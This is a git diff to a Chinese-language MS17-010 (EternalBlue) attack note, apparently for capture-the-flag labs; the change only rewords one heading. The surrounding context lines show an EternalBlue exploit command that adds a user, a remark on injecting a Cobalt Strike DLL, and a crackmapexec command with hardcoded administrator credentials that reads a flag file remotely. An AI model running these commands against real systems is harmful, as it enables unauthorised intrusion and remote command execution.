--- a/ms17-010/MS17-010.md
+++ b/ms17-010/MS17-010.md
@@ -40,7 +40,7 @@ python3 eternalblue_exploit7.py adduser.bin x.x.x.x
 使用NSA工具 注入CS的dll，或者开socks代理的dll
 ```
 
-### 使用smb直接读flag文件 不讲武德
+### 创建账号之后使用smb直接读flag文件 不讲武德
 
 ```
 crackmapexec smb $ip -u administrator -p 112344 -x 'type C:\Users\Administrator\Desktop\flag.txt'
